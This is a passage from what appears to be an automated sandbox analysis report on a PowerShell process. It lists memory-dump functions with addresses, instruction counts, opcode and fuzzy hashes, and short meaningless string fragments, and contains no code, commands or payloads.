Opcode Fuzzy Hash: 710aabd09aba5cf8c465af18a93194d90ad0a51b40fcb5245f70c2ef913341b5
Instruction Fuzzy Hash: 7C1135352047408FC768DF75C09085ABBF6EF8931532089ADD08A8B7A1CB36F802CF50

Function 04C8BF20 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3f238cc5499dc6d4cec7a4947782f8d30d8ee210b7c808ab8c383a65a5370b
Instruction ID: 4dff7e70ed24fd683f760adc3960ec65b39dc13bb6604c767ca37f40e6472307
Opcode Fuzzy Hash: 5d3f238cc5499dc6d4cec7a4947782f8d30d8ee210b7c808ab8c383a65a5370b
Instruction Fuzzy Hash: 17F022353093A11FD7018A7A9C509BBBFEADFCA25071441AFF884C7362DAB0DD048B60

Function 033ED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203152406.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_33ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58124b49e56183f7165435e16b2ef56f816d9fc029c6167f16612e3cff253406
Instruction ID: c3149b2ff9969f30b226d54e1bf9b789ef28c16d386124936cd62a745eac5e78
Opcode Fuzzy Hash: 58124b49e56183f7165435e16b2ef56f816d9fc029c6167f16612e3cff253406
Instruction Fuzzy Hash: 1301F2310043149EE720DA29CDC4B67FF9CEF46321F1CC46AED480A686C27D9C41CAB1

Function 04C890E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd28b9b3c31096e125ab83b5066b9f9edcb30c84d8cbd55d842d56242d9c0b84
Instruction ID: 752a8450e47faadf193d35047ade692c7729815544cfbb89298a0e4d43af4e7f
Opcode Fuzzy Hash: dd28b9b3c31096e125ab83b5066b9f9edcb30c84d8cbd55d842d56242d9c0b84
Instruction Fuzzy Hash: 14012076A043444BD7066B74C4583A67F62DFC1314F4481AEC1055B2D6DE356906D7B1

Function 04C8DE48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87ca16d9570645e94516c26d378acd014a0ffb58e05d692db3dd178dacca3d3
Instruction ID: b0f3442e90b38968550ce96de99a318e9fc43e3b152faacb381a5fdfd82b8a83
Opcode Fuzzy Hash: f87ca16d9570645e94516c26d378acd014a0ffb58e05d692db3dd178dacca3d3
Instruction Fuzzy Hash: AFF024753052186B8B22760AAC10CEFBB6FCED6BB9705406FE00BC7581EA20AD05C7B1

Function 033ED006 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203152406.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_33ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e469c704bdf581b2a986c82e246df04aeae41da7e5a6cf02c7ca712ecf44f378
Instruction ID: dd707832dedafb767307fbb95e685406f78bb35e8ccfa9ea09e556d473adeba9
Opcode Fuzzy Hash: e469c704bdf581b2a986c82e246df04aeae41da7e5a6cf02c7ca712ecf44f378
Instruction Fuzzy Hash: 7401527100E3D09ED7128B25CD94B52BFB8EF47225F1D80DBD9888F2A3C2695848C772

Function 033ED9A7 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203152406.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_33ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4803ba2d638daa721322c8b718b21a155174351cd4dd0e32d31667f363759254
Instruction ID: 2fc210dbe824ee25d7db73862e9e2468d8058d542e93efd49a830adddf2301f1
Opcode Fuzzy Hash: 4803ba2d638daa721322c8b718b21a155174351cd4dd0e32d31667f363759254
Instruction Fuzzy Hash: B3F0F976200650AFD720CF0ADD85C27FBADEFD4670719C55AE84A4BA51C671FC41CEA0

Function 04C8DFF8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3827d245d189838fde996df692bc07e698a0b95465518803bf2ef01daa243
Instruction ID: 46895146bb8a6a1cb4030db81185994e4372d5f3d14acb774161fdeaf475509d
Opcode Fuzzy Hash: 68a3827d245d189838fde996df692bc07e698a0b95465518803bf2ef01daa243
Instruction Fuzzy Hash: F3F082343041404FC3119F1DD894966BBF6AFCB71932914EEE585DBB36DA62EC02DB90

Function 04C89168 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6344849c156104e2166493b2dce0ac368481dac5a6debe41b610485be1e806
Instruction ID: 127dfebd890eb974af3c5621eb9dc68581fdd0c589e5d5e2861acd0c0ecdff7c
Opcode Fuzzy Hash: ac6344849c156104e2166493b2dce0ac368481dac5a6debe41b610485be1e806
Instruction Fuzzy Hash: BEF0B4755093045FD7209B78D4EC39ABFE6EB46314F04889DD14EC7292DB397881CB50

Function 04C87968 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a167a5c68425efc124a301706b859ed2b4bd743fbbbf169d5d9d4fa6c840dfe
Instruction ID: 5e38119400285e3351da4d89b631d5694937c90ebfc691f6e897aea5ee9b686f
Opcode Fuzzy Hash: 8a167a5c68425efc124a301706b859ed2b4bd743fbbbf169d5d9d4fa6c840dfe
Instruction Fuzzy Hash: DBF0A7717006249FC714AA59E844A6FB7FAEB88275B00092DE14AD3350DF74AD02C7A0

Function 04C87967 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f719936a5189469217a83c655c272844235a4ae886c7b7d47e82bd3eb337d184
Instruction ID: 7d6397e819ab93b2148dfda07c19f94df542c8e791f206f4c9c58fc1be53d4f5
Opcode Fuzzy Hash: f719936a5189469217a83c655c272844235a4ae886c7b7d47e82bd3eb337d184
Instruction Fuzzy Hash: 2CF0E231B002209FC7209A69A880A7FBBFAEB88225B00092CE04AD3250CE70AC02C760

Function 033ED998 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203152406.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_33ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344d69994baa6ac757c48ce7843f0f1f32aa63fa4febe417c02739bd7dc1f5b3
Instruction ID: 20c228653b6ee3a88dd8c8c9b0ff8163b2159ce0d39322771283e2bdf75cd1c2
Opcode Fuzzy Hash: 344d69994baa6ac757c48ce7843f0f1f32aa63fa4febe417c02739bd7dc1f5b3
Instruction Fuzzy Hash: 9DF0F975100680AFD725CF06CD85D23BBB9EB85624B198489B84A5B752C671FC42CF60

Function 04C87697 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cf1e6f5567a4d201add8aab1cf95ff7310ce727026f4eba15fb3a8c1b417d2
Instruction ID: 20bd09c7a9ac3c90f416c1f9fae64e757a8b14e18a1a837226412b2e456f474c
Opcode Fuzzy Hash: 20cf1e6f5567a4d201add8aab1cf95ff7310ce727026f4eba15fb3a8c1b417d2
Instruction Fuzzy Hash: 0BF082397001148FCB10FA6D984069A77A7EBC82557154199E409CB324EB64DC028B91

Function 04C890F8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6a163ee4800fbcf9004b71a2592fe42f948267ec66e70eabc2f36cd2f22e82
Instruction ID: 2230637350b8c3bf78888f350caa53515c5999e68d85c3f110bdfc909106a84a
Opcode Fuzzy Hash: 5e6a163ee4800fbcf9004b71a2592fe42f948267ec66e70eabc2f36cd2f22e82
Instruction Fuzzy Hash: BEF02E36B002048BE301BB64C04479BB7A6DFC0718F10816EC519473C4CE356845CBF1

Function 04C8E008 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1363fd0c4ac1262475ebd28806ed323105af676b6b51d5683f353a3d59dc63d
Instruction ID: b0d015702e6a4c695ca9f2f684bd5b585d8087ed037826ced9bb1c1ac324a868
Opcode Fuzzy Hash: f1363fd0c4ac1262475ebd28806ed323105af676b6b51d5683f353a3d59dc63d
Instruction Fuzzy Hash: 39E0E5357401108F83109B1ED498C26B7EAEFCE76972904AEE549CB735DB62EC02DB90

Function 04C8AF98 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8411e45c5644faee0fe6f7c613b3564199fbb621895f832c7849d8934aa4013
Instruction ID: c5bf401c9ea3f2615990cf545b7ceb46d85194f383d4ab1f24477993d8e2d048
Opcode Fuzzy Hash: a8411e45c5644faee0fe6f7c613b3564199fbb621895f832c7849d8934aa4013
Instruction Fuzzy Hash: 82E0DF723083A52B8B1AA12E2C141A6BB678AC322830880BFA140DB257DC13B8029390

Function 04C89559 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b35d6f67e233142d61b7e437e2dd0ba0ecd598c8ab5bfa08b429881c99e15c
Instruction ID: 043f49b431f84a2f47e11f07422cb0974b1d8d381bc924a0d8ff917042e9396b
Opcode Fuzzy Hash: 91b35d6f67e233142d61b7e437e2dd0ba0ecd598c8ab5bfa08b429881c99e15c
Instruction Fuzzy Hash: E2E0C2123412A613665470BA18006B7BACF8FE94AD388027DDA08D3747EC34EC0293F0

Function 04C88973 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60ef03a3f601620e088f6d7ccfbf564847611f26ebb006d258a458b22a02628
Instruction ID: 06cbc46e100b26160b64411e0b069dba26a924b0eea00f2b6316dfb374d690e3
Opcode Fuzzy Hash: f60ef03a3f601620e088f6d7ccfbf564847611f26ebb006d258a458b22a02628
Instruction Fuzzy Hash: 9DE0923671461897CB097B75944C7AE7A57EBC4729F04802ED60A87286CF355802C7D5

Function 04C88739 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e9abf24a4f7049bfa3e8a1f722aba025e88f73528a36fba27e543e68e24f7e
Instruction ID: d8cb10a664118e4e4e5222a2a273af9ab2679bb0f8ee671bfb6ec31e9b14136a
Opcode Fuzzy Hash: 89e9abf24a4f7049bfa3e8a1f722aba025e88f73528a36fba27e543e68e24f7e
Instruction Fuzzy Hash: 5DE0D8308151098BCF09BBFAD4499FE7F32EA01304B4041ADE513D2697EA30658ACBD1

Function 04C89178 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b846a9806b85936f904687b36c9748334e4ab2baa03d62aa53977a1573a68d2e
Instruction ID: 26fdac11296333ead135d41d7289f70687b3cc8b77b0a529ba004b5b526431f2
Opcode Fuzzy Hash: b846a9806b85936f904687b36c9748334e4ab2baa03d62aa53977a1573a68d2e
Instruction Fuzzy Hash: A1F06D749053048BD360DF78D4DC79ABBE6EB44324F00486DD51ED7281DB39A8818B90

Function 04C88978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eddecdb07c77082a621de1d473f40b3369090540b2fb1aada90a852de896f0d
Instruction ID: 47dea41beb8016e6acf7a606669b3922a0a0e64dcfc2e152d76368e0bdc6a935
Opcode Fuzzy Hash: 7eddecdb07c77082a621de1d473f40b3369090540b2fb1aada90a852de896f0d
Instruction Fuzzy Hash: A5E0263670471897CB093779A40C7AE7A5BEBC4738F00402ED60A87386CF385C0283DA

Function 04C89560 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7df65c862829bdb8540d63a16842c12d1b7418e15ef517bda38443b0905422
Instruction ID: 470b931b114bf32cfff35e464155cca68c687052656f464f4810d15fe73a28e0
Opcode Fuzzy Hash: 2d7df65c862829bdb8540d63a16842c12d1b7418e15ef517bda38443b0905422
Instruction Fuzzy Hash: 27D0A71234126617265470FE180067BE5CF8FD88AD785013E9A09C3B46EC60FC0253F1

Function 04C8DEA8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 3bfdeaeb49a89f2d593e5437b9c38be4158e78801008620763ebb861134c7289
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: C3E08635B00114A78B08955AD4104D9F7ABDFCC224F04807ED90AA7381DE32691697E1

Function 04C8DE58 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343265b06e3462640d4fd3f3c2ac7da74936c71049ad9b251ed50469990d3a6f
Instruction ID: ecd759afc89c7ec59b0733fb5b6f0b1c7f7a3c54d6036c5614f213effbbe30ca
Opcode Fuzzy Hash: 343265b06e3462640d4fd3f3c2ac7da74936c71049ad9b251ed50469990d3a6f
Instruction Fuzzy Hash: 81E0C275700614478215BA1EA810C9F77EFDFC56B6311843EE00EC7394DE64ED058BD5

Function 04C88800 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1114299a4d8c6e949bbab206c04efa3305261721a97b5a24000386f235a2f3e
Instruction ID: 0bf4b8f2bda72038b290d7b72eb882a5045c44a097ddd5e781319c20f7a86f28
Opcode Fuzzy Hash: b1114299a4d8c6e949bbab206c04efa3305261721a97b5a24000386f235a2f3e
Instruction Fuzzy Hash: 4EE09234A1820E8B8B04BFA4D446569BFB2EB55308B04806CDD049774ADA306841DBD0

Function 04C8F620 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7529fd5da774240d3cac3d37017d84bb3c6449f62758e2c49cdb1ecc3f36bb92
Instruction ID: 4ab76486efe1feaa020b57528ac77268cdfcc86e4f1e565dad8215e32f728710
Opcode Fuzzy Hash: 7529fd5da774240d3cac3d37017d84bb3c6449f62758e2c49cdb1ecc3f36bb92
Instruction Fuzzy Hash: 8EE0DF70D00249AF8780EFBCC80456AFFF0EB48200F5084AEC908D7301E631AA028BD1

Function 04C8F630 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 88817f5e3c0457180ef63e58809d9420aeabff5b874f4e4261cf355027a63aa2
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 99D067B0D042099F8780EFADC94156EFBF5EB48204F6485BE8919E7311F7329A128BD1

Function 04C88748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97f7f9cc9b3bc87de55b9fb245e6ffce33eb59c479f7f034ef73111cc399e8f
Instruction ID: cf607acc340793bad773947018efb988f1799cff4c3c2f960385feb9c62bb26d
Opcode Fuzzy Hash: e97f7f9cc9b3bc87de55b9fb245e6ffce33eb59c479f7f034ef73111cc399e8f
Instruction Fuzzy Hash: 5DD012308151098BCB0CBBA5E41A9FD7B35FA00301F41415DD91792196EA301A86CAC0

Function 04C88810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a653cce094d6f266f65f3bcf8be0617c31b35a09eaf58c6b37899e4c2760d4
Instruction ID: 0f6f1d886042c0b55896f6009fead0708c2c52dde46356f6b8521ee9a6acbddb
Opcode Fuzzy Hash: f4a653cce094d6f266f65f3bcf8be0617c31b35a09eaf58c6b37899e4c2760d4
Instruction Fuzzy Hash: 29D01734A1920A8B8B08EFA8E44696EBBB6EB44304F00816DDA09D3355EA306841CBC1

Function 04C87932 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb6ddb0e66623c460a6319c5bf74d2f9a076e24f6af3c795a231f8c550827e0
Instruction ID: e52d5bf5d39c32f740eb4941ecc903c36b1972c8cc9e4ccdc1f5be5d796abb34
Opcode Fuzzy Hash: dbb6ddb0e66623c460a6319c5bf74d2f9a076e24f6af3c795a231f8c550827e0
Instruction Fuzzy Hash: 80D0923444E7C4AFC7279F7894948183F709E4312931945DED88A8F5A3CA768449DB57

Function 04C87940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1f12bdfb5d424841434df66c7fb42110633d628431f0256a37bf1f993a9088
Instruction ID: 2b21d4069e4300f05a7d03d5d7f88dfc7c6ae308e50ca994a2c39da208276365
Opcode Fuzzy Hash: 2b1f12bdfb5d424841434df66c7fb42110633d628431f0256a37bf1f993a9088
Instruction Fuzzy Hash: EDB0923104870C8FC2586F79A4449147329EB4521938004ECE90E0A2928F36E88ACA45

Function 04C87EB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320a47f451d4e603909652fd9c67428f022c4ee7f35502d20b7cb82e48f1eb79
Instruction ID: 54233879b3321e380880b82c7462fad6a452968e89d71af67d4de37788e278c7
Opcode Fuzzy Hash: 320a47f451d4e603909652fd9c67428f022c4ee7f35502d20b7cb82e48f1eb79
Instruction Fuzzy Hash: F9900236A6811147BF0CDBB585596393A6757C2201314C4696543C0044CD344451D506

Non-executed Functions

Function 07A41BE0 Relevance: 20.4, Strings: 16, Instructions: 403COMMON

Download Yara Rule

Strings

JUl, xrefs: 07A4200B
84Rl, xrefs: 07A41F76
JUl, xrefs: 07A42017
$cGk, xrefs: 07A420B4
4']q, xrefs: 07A41F95
tP]q, xrefs: 07A41FEB
rTl, xrefs: 07A41C5D
4']q, xrefs: 07A41F89
JUl, xrefs: 07A420CE
tP]q, xrefs: 07A41FDF
4']q, xrefs: 07A41C92
4']q, xrefs: 07A41C86
JUl, xrefs: 07A420C2
rTl, xrefs: 07A41C53
84Rl, xrefs: 07A41F6C
JUl, xrefs: 07A41FA1

Memory Dump Source

Source File: 00000009.00000002.2231680711.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: $cGk$4']q$4']q$4']q$4']q$84Rl$84Rl$tP]q$tP]q$JUl$JUl$JUl$JUl$JUl$rTl$rTl
API String ID: 0-1556152091
Opcode ID: 313828b77ae09260836f2576e212dc75cfa2bdc434cfb7c501b401429444b3ba
Instruction ID: f311092d4ebc8f10b76d55e33aeb9d5a81a2575a7a33b6167605e7aba2bc45ff
Opcode Fuzzy Hash: 313828b77ae09260836f2576e212dc75cfa2bdc434cfb7c501b401429444b3ba
Instruction Fuzzy Hash: 27D156B5B0420ACFCB258B68D84466ABBF6EFC5311F14C4ABD465CB251DB32CC86C7A1

Function 07A43280 Relevance: 9.1, Strings: 7, Instructions: 329COMMON

Download Yara Rule

Strings

RTl, xrefs: 07A43294
,STl, xrefs: 07A4345D
RTl, xrefs: 07A4342B
,STl, xrefs: 07A43469
tP]q, xrefs: 07A43330
tP]q, xrefs: 07A43324
p5Dk, xrefs: 07A4344F

Memory Dump Source

Source File: 00000009.00000002.2231680711.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: ,STl$,STl$p5Dk$tP]q$tP]q$RTl$RTl
API String ID: 0-429453677
Opcode ID: 2f75897b8e3d054c61ad81e9e048dcc7a0ac12165632b8c7f65cd89899d82e02
Instruction ID: 637f8d52ffa62de25658f619b9263626cca853f040daa8f52ca0dd2a7f390f25
Opcode Fuzzy Hash: 2f75897b8e3d054c61ad81e9e048dcc7a0ac12165632b8c7f65cd89899d82e02
Instruction Fuzzy Hash: 20B18BB17043059FCF259B298C05BAABFF6EFC2311F14C06AD565EB291DA76D840C7A2

Function 07A43928 Relevance: 8.9, Strings: 7, Instructions: 126COMMON

Download Yara Rule

Strings

$]q, xrefs: 07A43960
tP]q, xrefs: 07A439B1
$]q, xrefs: 07A4396C
tP]q, xrefs: 07A439A5
Jl, xrefs: 07A43A1D
$]q, xrefs: 07A4393A
Jl, xrefs: 07A43A0F

Memory Dump Source

Source File: 00000009.00000002.2231680711.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q$$]q$$]q$$]q$Jl$Jl
API String ID: 0-647252645
Opcode ID: 7a6e58b5e38d92e89d809c9345bc329d184ce20c3f72cc4b90e964b98a564986
Instruction ID: b917faf0da04c21114ee17dde0485d4f6a99c8dba2ef7097654de562c56b5497
Opcode Fuzzy Hash: 7a6e58b5e38d92e89d809c9345bc329d184ce20c3f72cc4b90e964b98a564986
Instruction Fuzzy Hash: B1415C763083559FCB158B699C50A66BBF5AFC5620F2885ABE854DB363CA33CC05C391

Function 07A42107 Relevance: 8.8, Strings: 7, Instructions: 86COMMON

Download Yara Rule

Strings

JUl, xrefs: 07A421BA
JUl, xrefs: 07A42156
JUl, xrefs: 07A4214A
$]q, xrefs: 07A42172
TcGk, xrefs: 07A421F2
$]q, xrefs: 07A42166
JUl, xrefs: 07A421C4

Memory Dump Source

Source File: 00000009.00000002.2231680711.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: TcGk$$]q$$]q$JUl$JUl$JUl$JUl
API String ID: 0-2711788700
Opcode ID: dbff57c7cc6b6b9d6d8d09d544663a8f15cf9a18ca076a10caf7f9904e9f0d98
Instruction ID: 8f4a0953e80dac3b6ed23ad12a728bbbdd94e5b8e763baf61133113ff7d9dcf2
Opcode Fuzzy Hash: dbff57c7cc6b6b9d6d8d09d544663a8f15cf9a18ca076a10caf7f9904e9f0d98
Instruction Fuzzy Hash: F02157B52083818FC326473C5C11793BFB7BFD3610B1985ABE6609F696CA329854C3A3

Function 04C87A2F Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 04C87C44
`^q, xrefs: 04C87BA2
`^q, xrefs: 04C87B23
tMTl, xrefs: 04C87AD4
`^q, xrefs: 04C87CC2

Memory Dump Source

